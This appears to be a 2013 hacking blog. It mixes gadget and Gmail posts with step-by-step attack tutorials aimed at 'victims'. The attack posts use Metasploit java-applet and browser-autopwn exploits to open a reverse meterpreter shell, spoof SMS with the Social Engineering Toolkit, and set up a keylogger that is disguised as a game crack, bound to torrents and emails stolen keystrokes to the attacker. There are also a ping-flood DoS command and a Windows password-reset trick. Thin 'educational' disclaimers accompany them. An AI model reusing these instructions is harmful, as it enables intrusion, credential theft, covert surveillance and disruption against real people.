Friday 24 May 2013

HIDE YOUR IP ADDRESS


I am introducing a software to you by which you can hide you ip and do what ever you want on internet

but this is only for a educatioal purpose you dont have to use this tool for anything else if you do something

wrong i am not responsible for this

DOWNLOAD IT FROM HERE

Hacking Windows 8 Easily.

Kali Linux : Hacking Windows 8 Easily.



So as you have heard, New version of Backtrack was released last month, Dubbed as Kali Linux, This edition brought many changes in the Backtrack OS, for more details, Click Here.
We haven't done a Hacking tutorial in some time, So here you go, Our First Kali Linux Tutorial, Using our favorite tool "Metasploit" we will now create a Java Signed Applet, which will enable us to control the victims PC, use his webcam, see whats on his screen, tap their key strokes and much more.
So Let's Begin :


What Do You Need For This Attack :
# Kali Linux "Backtrack 6" : Get It Here.
# Metasploit On it . (tutorial below)
# A Victim using Windows 8.
# Brains And Balls !


KALI Linux And Metasploit :
Kali Linux, This evolved version of our lovely Backtrack, Is a Linux Distro Specially Created For Hackers, By Hackers. You will find 1000+ Tools in it which are capable of SQL Injection, IP Smurfing, IP Scanning, Password Cracking And more. It is based on Debian, Which is known as the most tested and most solid base for any Operating systems.It Has a very big software library and it is pretty easy to Use.
BEST THING :Its Open Source.
Metasploit is a security penetration tool,Based on Metasploit framework, and if you have viewed our previous post, you might have an idea how to use it. Metasploit was buggy-as-hell in backtrack, but i'm happy to tell you it has completely changed its libraries and is now smooth as silk on Kali.


Steps To Perform This Attack :
#1 - Launching Metasploit On Kali Linux :
So I Assume you have Kali Linux running on your PC, doesn't matter if its on a Live CD, USB, Or Installed.
So Now you need to open the terminal and type this :

msfconsole

Give it a sec, and after it has loaded, type (or copy/paste) this command :

use multi/browser/java_signed_applet

It would look something like this picture below :




Click To Enlarge.


#2 - Setting Port Numbers :
So you know we need an active port on both victim pc and out computer, so that our computers can talk to each other.In this version, this port is called SRVPORT, and we can set it by :

set SRVPORT [Port number]

it is by default 8080, but i have set it to 1020, you can set it to anything you want.

Now to change the path to the exploit, we can set the URIPATH to anything we want. We can leave all the settings as it is, but it will look a little bit ugly, And ugly is bad for hackers, we want our thing to look like a diamond, so that everybody wants it. So to do it we will type this command now :

set URIPATH /

#3 - Verifying if it is done correctly :
You don't want any errors, trust me, so why don't you look at all the command you have typed.

#4 - Launching the exploit :
After checking everything, we will type this command and this will launch our exploit :

exploit

now all you have to do is send the IP to the victim, and get one click on it, The BAZINGA, you have hacked his PC.

Of-course he will see a warning like this :





but you can get past it, can't you guys .

#5 - Welcome To His System :
Now you have opened a meterpreter to the victims PC, and if you search Google for some powerful commands, you can erase/delete/corrupt/shut down/reboot/steal his files/passwords etc . So use it carefully.

So Well how was this post ? Love/Hate/Spot A Mistake, whatever it is, leave it at the comment section below and i will get back to you.Also like us on Facebook and twitter so you don't miss a single update.
NOTE : This blog will be shut down, as in a protest against CISPA aka Internet Leech aka GOVT SHITTING ON OUR FACES, We would love it if you also help us in this battle.Nothing much, just spread awareness about it.

SEND UNLIMITED SPOOFED SMS

Hacking Mobile Number.



Duplicate/Create And Send SMS By It :



Welcome,This is my First post about mobile hacking,In this post,We are going to create any mobile number (police,fire department,ex-girlfriends,etc) and send messages,Sure this method has only 75% success rate,but it works like a charm for the most time.In spoofing attack the attacker (you) make himself a source or desire address.This post is only for education purposes,and this trick can be traced back to the source very easily,So don't create a scene.



So What Do WE Need :
#SET-Social Engineering Toolkit, Available On Backtrack.
#Brain-To Sense what is wrong and what is right,And to follow this procedure.

Step 1 :
Open "Social Engineering Toolkit" in Backtrack 5 (mine OS) by Opening your backtrack console & Typing

cd /pentest/exploits/set

Step 2 :
Once the directory is opened,Type "./set" to fire up the social attacking kit.

Step 3 :
Now select option number 7.This module allows you to specially craft SMS messages and send them to a person. You can spoof the SMS source if you want to,its not that hard.

Step 4 :
Now select option 1 "Perform a SMS Spoofing Attack”

Step 5 :
Select how the "spoofed-sms" should distribute,you could send it to many people or just one,Your choice.

Step 6 :
Now you need to enter the number of the receiver (victim), make sure to enter with country code.Example : +9188260xxxxx for India,

Step 7 :
Now select 1 for pre-defined Templates,that is helpful to newbies, of-course you can create your own.

Step 8 :
On this step you need to choose the templates,I will choose the "Boss" one,you can use according to your situation.

Step 9 :
Now you need to select the service which will send that crafted SMS you created,You can choose whatever-the-hell you want,If you have an Android Emulator that is just great.

Step 10 :
POOF ! You just send an spoofed message,which is capable of stopping war or creating it,depends on you.

Like This Post ? Spotted any mistake ? Leave your feedback on the comment section BELOW.

ONE MOBILE RUNNING 7 OPERATING SYSTEM FAVOURITE OF HACKERS

1 Mobile Running 7 Operating Systems.
7 Operating System On 1 Mobile.

Yep You Read That Right.



Do you think that only New mobiles are powerful ? If yes,i'm going to Prove you wrong,I am going to Introduce you to a mobile which was launched at 19 October,2009 (yepp) and still is the most versatile,powerful,flexible mobile ever made.ANY GUESS ?

Well this Mobile Is HTC HD2,this mobile is the favourite piece of hackers all around the world.Why ? because of its top of the line CPU,A masterpiece motherboard,a screen bigger than hell,and Some Lucky Powder in its box.This mobile just Refuses to die,throw any OS on it,add a bit of tweaking and it'll run it without any lag or glitch.




Till this date,this mobile is Capable of Running :
*Windows Mobile 6.5 (native OS)
*Windows Phone 7 and 7.5
*Android (all versions except jelly bean)
*Ubuntu (yep,that computer OS)
*MeeGo
*Windows RT.
*Windows Phone 8
need proof,Here you go -

HTC HD2 Running Ubuntu -


Ubuntu is a full Linux distribution - and it's not designed for smartphones. But with the large touchscreen, high display resolution and fast system speed of the HTC HD2 I decided to make Ubuntu easily available to HD2 end users!
This is not a secret warez ROM proprietary junk. Source code information is out on the Internet.
The Guys at xda-developers are true engineers,and this mobile is their legecy,to read about Ubuntu On HTC HD2,Click Here.




HTC HD2 Running MeeGo -




Though MeeGo died an infamous death,it was a full-fledged Linux distro, and was fully designed for mobile phones, which will make it more usable for phones than Ubuntu It had a lot of major companies like Intel and Nokia putting a lot of money and time into developing it. It was failed because of many reasons including: not that much availability of apps,laggy performance,and a little lack of brand promotion, Although this OS looks good and has all the bells and whistles. And it rocks On HTC HD2,Follow The xda-developer thread Here.

HTC HD2 Running Windows Phone 7 -



The HD2 was the last HTC handset to run the old Windows Mobile OS which, even with HTC's excellent Sense UI on top of it, had a number of niggling problems that left our reviewer cold.Now a Chinese forum has finally figured out how to get a fully functioning version of Windows Phone 7 working on the HTC HD2. Now the xda-developers took controls are made an even better version.This is the only mobile in the history which was able to run Windows mobile 6.5 and Windows Phone 7.Follow xda-developer thread Here.



HTC HD2 Running Android -



HTC HD2 is counted in the TOP 10 list of mobile having this much android ports available.Developers are rolling out android update like crazy for HTC HD2,hell this mobile even has its own site for android firmware collection,Some people have even said that it gives better Android experience than the devices that have android as their Native OS,Developers are currently working on Android 4.2 ROM for HTS HD2.









HTC HD2 Running Windows RT -




Now this Is way too much,this mobile is being multi-talented kid for doing this thing too,Windows RT,classified as HIGH END MOBILE OPERATING SYSTEM,is running on 5 year old mobile,Now that is just over the head.Hats off to the developers/programmers for giving this gift to us.Windows RT is running Smoothly on HTC HD2,and this news has increased the life of HD2 furthermore.XDA Elite Recognized Developer Cotulla has a long track record of doing extraordinary things with Windows devices, and the HD2 is no exception. After teasing the developer world with what he called a “proof of concept” of getting Windows Phone 8 installed and running on the HD2. When developers can do anything and everything they desire to a device, we get gems like this one. When they can’t, they stop recommending the manufacturer and people stop buying.





HTC HD2 Running Windows Phone 8 -




With its 480 x 800 pixel display across 4.3 inches, users working with this build will still be seeing 217 ppi, A respectable density for a display even by today’s standards. Of course the HTC DROID DNA’s 440 is in a brand new league, but that’s beside the point. Today it’s all about the glory of getting a software working on a device for which it was never intended. Windows Phone 8.0.97 running on a Qualcomm QSD8250 Snapdragon processor with a single 1GHz Scorpion CPU and Adreno 200 graphics, we have got to wonder if the software is able to creep by at a respectable pace.




So what is next ? iOS,Blackberry OS,We don't know,We could just hope for the best.


So Did i made an spell mistake or found an error in something,don't hesitate to leave your feedback in the comment section BELOW .

GOOGLE EYES CONNECTED TO INTERNET

Though it may look like something from a Sci-Fi movie,The guys at Google have developed eyeglasses that are connected to internet,Yes,Connected to Internet.And you might be thinking there will be a whole bag of wires and microprocessor's you have to carry in a bag,NOPE,The are just a Pair of eyeglasses which looks like any ordinary glasses.Project Glass is a research and development program by Google to develop an augmented reality head-mounted display .Project Glass products would display information in smartphone-like format hands-free and could interact with the Internet via natural language voice commands.

Specifications :



2 Glass Of 4 Centimeters.
Google Android Operating System
AMOLED Screen
Cellular Specifications : 3G and 4G Supported
WiFi - B/G/N
Bluetooth 4.0
Front Facing Camera With Flash (Resolution Not Specified,I'll Guess Around 8 Mega-Pixel)








So Is It Anything Like JARVIS,The Iron Man's Butler ?





Uh,No.Jarvis was an Robotic Life Assistance System,And These are just a pair of Smart-Sunglasses.I'm Pretty damn sure that they want to create an real Life version Of Jarvis. Though This thing Can Click Pictures,Make Phone Calls,Connect To WiFi and Lets you Browse the internet,Get Directions From The GPS Satellite overhead,Be an Active Language translating Device,And a good programmer might be able to teach it to Fire rockets on Command,But this thing has a long way to go to Catch up JARVIS.

When Will You Be Able To Wear Them ?

Though Google is in an hassle to release them in market as soon as possible,But the estimated release date would be Late 2014 and Early 2015's.At last year’s Google developer conference, the company took pre-orders from developers of Project Glass for $1500 of what they called the “explorer edition.and will ship them later this year.

Okay,So What Are Its Disadvantages ?

We all know FBI,CBI,INTERPOL,RAW,ISI,NSA ETC Spies on us using our mobile and street surveillance camera's (thank you The Jason Bourne ,Batman And others movies),What we now have is an camera,On our Eyes,Which is giving Live Feed to Cloud,Every Second.We could easily call this thing Surveillance 2.0,On the (very) Bad side,If an hacker founds a way to access your feed,This could Get you in serious trouble.And we all know Google is not VERY GOOD in their database security.

Can We get an preview PLEASE !!!

Google has released TWO previews for this device,and They are pretty amazing,Check them out below.

 So How Was this article,Like It,Hate it,Found an mistake ? Don't hesitate to comment on the comment section BELOW

VULNERABILITY SCANNER HELP TO HACK A WEBSITE

VULNERABILITY SCANNER HELP TO HACK A WEBSITE


it is a perfect vulnerability scanner for you if you want to check the site which you want to attack is vulnerable or not it gives all the information related to the website which door is open for you and which is closed it tells you everything so that it is easy for you to hack or deface a website.

DOWNLOAD IT FROM here

HACK ANY ACCOUT BY NEPTUNE A PERFECT KEYLOOGER

Project Neptune : Tutorial And Review.


The Ultimate Keylogger For Windows.

Hacking 101.


The Project Neptune is known to be one of the easiest Keylogger for Microsoft Windows operating systems. Using this little software, You Can track victims keystrokes, know what he is typing, searching, know his passwords and personal details.Get screen shots etc.

This software is completely undetectable once installed, Even to antiviruses. Another useful feature of this software is that it can send you the logs (recorded keystrokes) to your e-mail address.All this will happen and your victim would not know about it.
So Lets Install software and hack some assh#les.

Warning - Use this software on your own Risks.I am not responsible for any damage you cause.





What Do You Need ?
# Project Neptune Software, Get It Here : http://project-neptune.net/download/
# A Click On The Created File.
# A USB-Drive.

Step 1 : Download the software.
Download the Project Neptune software from its website and save it on a pen drive or something.

Step 2 : Open the Software On Your PC.
Double click on the software to open it.

Step 3 : Configure the Software .



Open the software and come to the "Keystrokes" menu. Now I'm using email to receive the logs, you can use FTP if you want to ! Use the Picture for an example on how to set up this menu -->>








Now Go To The Menu " System Wide" :
Now check the required options as per your requirements, It would be a good idea to keep the level Low or non-existent.

Now Come to the "Installation" Menu :


This menu will define the behavior of the software, Use the image for help. It would be a good idea of you set the installation directory to system folders. You can also bind the program to a file, we will skip this option.








Skip To "Server Creation" Menu :




In the server settings I would recommend putting something here if you want to make it less suspicious. Put something that would make it look like the origional program. Like "Halo Cracked" or "Black Ops Aimbot", something like that.
Don't check "Copy File's Creation Date" or "Use File Icon" unless you have the premium version.
In the file pumping section I would increase it by 1000+ kb to make it less suspicious.
In the server generation tab, where it says "Mutual Exclusion (Mutex) String" after that hit the refresh button.
There it says automated cure password you can use the refresh button or you can type in a password of your choice.
Then, keep the process name as "iexplorer.exe"
Then hit the Generate New Server button and it will create a server for you.




File Binding Time :
Now you need to bind the created file to a normal file that you will send to your victim. If you are planning a mass attack, which involves capturing key-logs and screen shots of hundreds and thousands of people, Bind it to a torrent file or bind it to a software and upload it to any file sharing service.
If you are planning to attack a single victim, bind that file to something more like an power-point presentation or something that the victim would click on.

Step 4 : All Set.
Yayy ! you did it, this is the most basic attack anybody can do, If you want to increase your level as Hacker, try backtrack, It has some wicked tools.

Watch this video for example on how to install and setup, Our steps were a bit different, But both will get the work done :




So how was this post ? love/hate ? leave your feedback on the section below, like us on Facebook and twitter and share this article. Thanks guys !!! Peace Out

DOWNLOAD IT FROM DOWNLOADS

HACKING a computer and stealing data


Hacking Computer And Stealing Data
Hacking Any Pc on LAN (with BackTrack).
In this Tutorial,I'll show you how you ca
# Make a Fake Webpage.
# Control Victim PC on LAN .
# Steal his files or destroy his P
For this you will need -
# Backtrack 5
# Internet Connection on a LAN
# Brain and Patience.
So Lets get it started.

Today we are going to hack a remote PC on LAN.LAN (local area network) is used in schools,libraries,collages,hostels,dorms,airport,or in your locality.Backtrack is a live OS and has powerful tool for hacks and in it we are going to use SET toolkit. So first you have to know about SET.

What is SET ?

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element.SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation tool-set The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.With This toolkit you can make fake and scripted pages.

Now,Back To Work -

Step 1 -
Open up your Terminal and Change your work directory into /pentest/exploits/set/

OR

Step 2 -
Go To Menu and open Social Engineering Toolkit(SET) ./set and then choose "Website Attack Vectors" because we will attack victim via internet browser. Also in this attack we will attack via website generated by Social Engineering Toolkit to open by victim, so choose "Website Attack Vectors" for this options.

Step 3 -
When user open a website,78% of times they don't think that they are opening suspicious website that including malicious script to harm their computer. In this option we will choose "The Metasploit BrowserExploit Method" because we will attack via victim browser.

Step 4 -
Now we will choose the "Web Templates" option,because we will use the sites that already provided by Social Engineering Toolkit.

Step 5 -
There are 4 website templates Ready To Use for this attack methods, such as GMail, Google, Facebook, and Twitter. In this tutorial I will use Google. Ofcourse you are more than invited to use your imagination.

Step 6 -
We are doing the attack on an unknown pc,so we don't know what kind of pc he/she is using,for example antivirus,browser,hardware configuration etc.So we will choose "Metasploit Browser Autopwn" to load all vulnerability Social Engineering Toolkit known. This tools will launch all exploit in Social Engineering Toolkit database.

Step 7 -
Now choose "Windows Shell Reverse_TCP Meterpreter",you are more-than-invited to use your creativity.

Step 8 -
Now for an connection we'll set up the Connect back port to attacker computer. In this example I use port 2838, but you can change to any port you like.

Step 9 -
The next step : just wait until all process completed and also wait until the server running.this may take some time.

Step 10 -

Now when the server has started runnuing,it will show up a command like this ->
Now give this link to user via facebook chat,mail,or anything and provoke him/her to click on it,once they do the page will load it with all malicious script to attack victim computer.

Step 11 -
Now if there is any vulnerability in victim computer it will return sessions value that mean the exploit has successfully attacked the victim computer.In case their is an exploit,it will automatically create a new fake process named "Notepad.exe".

Step 12 -

To view active sessions that we have opened by the exploit type "sessions -l" it'll listen for any active sessions. Take a look to the ID…we will use that ID to connect to victim computer.For example ->

Step 13 -

To interact and connect to victim computer use command"sessions -i ID". ID is numerical value that given when you do-sessions -l. For example you can see example in picture below.

Step 14 -
If you do everything right,the end result would be an opened meterpreter. By the help of meterpreter,you can do almost anything.For example type "systeminfo" and this will give you all the hardware and software information.You can shutdown and restart the victim pc (get the commands from here : http://www.computerhope.com/shutdown.htm ) or delete one of his system file and corrupt his/her pc.
You can do this on a remote pc (outside LAN) too if you own a web server of vpn.

Warning "This tutorial is only for education purposes,doing thing with somebody who hates you would give you a free ride to jail if they find out it was you."

USE gmail without internet



Gmail is the Google's popular email service which is being used by millions of users around the globe. But you need to have an internet connection for accessing your Gmail account.
But you can also access your Gmail account offline. Few days back Google had launched Gmail Offline which is a browser plugin that allows users to read, respond to, and search mail even when there's no Internet connection. You can use most basic functions but its useful while you do not have internet connection.

Follow these steps to setup your offline Gmail :

2. Then add this extension to Google Chrome.

3. It will ask to allow you to offline mail storage. 

This browser plugin is only available to Google chrome. So you need to have Google chrome for using your Gmail offline.

But this Offline Gmail app can store email messages for three to seven days only. If you want to delete offline inbox open chrome://settings/cookies and press Enter and delete all the cookies.

CALL FROM any number to any no.



Call Spoofing means to show any phone number when you call the victim.You can use this to irritate,scare and annoy your friends. There are a number of sites which do this for you, but you require some credits or tokens for them. Fun comes at a cost :D So,here are the sites :

1.http://prankowl.com/

2.http://thefunnyfone.com/

3.http://www.prankcall.ca/

4.http://www.prankdial.com/

SECURE your gmail account


Gmail is used by people all around the globe and it is one of the best email service in terms of customer support, security, user interface and the amount of storage space provided to a user. Google takes extra care when it comes to security and there are practically no loopholes in gmail when it comes to security of it's users. But still accounts of people get hacked. The reason for accounts being hacked is not weak security by google but a lack of knowledge about E-Mail Security amongst users. I'll like to suggest some tips which can increase the security of gmail to many folds: 

Keep a Strong Password

The first step to increase security of your account is to make sure that you keep a good strong password which is not easy to guess by anyone. A good password contains following things:
  • Above 8 characters long.
  • Combination of numbers and words.
  • Shift keys(!@#$%^&..) provide an increased level of security.
  • A combination of words with caps lock on and off.
Whereas a bad password is the one:
  • Which is the same as username.
  • Which is easily guessable by people who know you, like your birth date, school name, mothers name etc.
  • Which is very short.

Give a Recovery E-Mail of Which You Have an Access

While making a gmail account, we are asked to give recovery email address where gmail can contact us if there is some problem with our account. Many people give recovery email address of which they do not have access or the recovery email address is of sites which provide temporary email address like yopmail.com. Giving such email addresses is a bad practice as this can land you up in a problem when gmail has to contact you for security issues.

Enable 2-Step Verification

2-Step Verification is one of the best features of gmail and this which is not breakable by anyone till date. This features increases security of our account many folds. Once you activate 2-Step Verification on your gmail account, when you enter the password in your gmail account then gmail sends you a unique code on your phone which you have to enter in the login screen. After entering that unique code only you are allowed to access your gmail. So, if by any chance if someone manages to get your password, still he'll be unable to login if you have 2-Step Verification Enabled. To enable this feature in your account go to account setting and then security.

PERFORM dos attack with cmd



DOS Attack With Your Home pc To Any Website U Want To Be Murdered!!
Dos Strike Stands For Denial of Service Attack

What Is Dos?
A: Denial of Service (Dos) attacks are ambitious attacks on an specific Computer or Website with motive to deny services to intended users.
Dos attacks can target end-user systems, servers, routers and System links(websites)
Requirements:
1- Command Prompt (Cmd or DOS) Which is usually integrated in all Windows.
2- Ip-Addres of Specific Site.
How to get IP of any site??
Not an issue.. here is the solution..
Goto Run And Type Cmd...
open ur CMD (command prompt).. and type
nslookup Site-Name

(e.g nslookup www.youtube.com)

It will show u ip of the site.
DDos Attack
ok now write this command in CMD For Attack on Any Site/ Server..

ping SITE-IP -l 65500 -n 10000000 -w 0.00001
-n 10000000= the number of DoS atempt.. u can change the value "10000000" with ur preferred value u want to attempt attack.

SITE-IP= Replace the words with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

Play your favourite android games on your PC


Bluestacks is a Silicon Valley-based software company that produces BlueStacks App Player and BlueStacks Cloud Connect. Both products revolve around enabling Android applications to run on Windows PCs, Macintosh computers and Windows tablets. The company was founded in 2009 by Rosen Sharma, former CTO at McAfee and board member of Cloud.com. DOWNLOAD IT FROM here

BREAK windows admin password



I would like to introduce you with the very simple Trick to Break User Accounts passwords..

Remember: This trick is only to break Passwords if the "Administrator" Account of the system not protected with any password..

Alright, so here we goes with the trick-

Simply Start your system. I am supposing the Operating system is "Windows XP"
Now the "Login Window" will be appear .. That will have a textbox to enter the Password..

You just need to press "Ctrl+Alt+Del" key twice speedly..
-now what will happen? The Login window will be changed ...and another textbox of "Enter Username" will be appear..

In that text box you need to write username as: "Administrator"
Press ENTER key...

That's it.. you will be in the Administrator Account..

Now suppose you want to break another user's password with the administrator account in which you have recently entered..
Press "Window+R" key to Open "RUN" window..
Type the following command exactly i am telling you:

NET USER user name *

Note: user name is the username of the another account which password you want to crack..

Now A command prompt will be appear and will ask to enter New password..

Jus press ENTER key twice..

That's it the password of the "user name" username will be empty..

Thanks for Reading this article..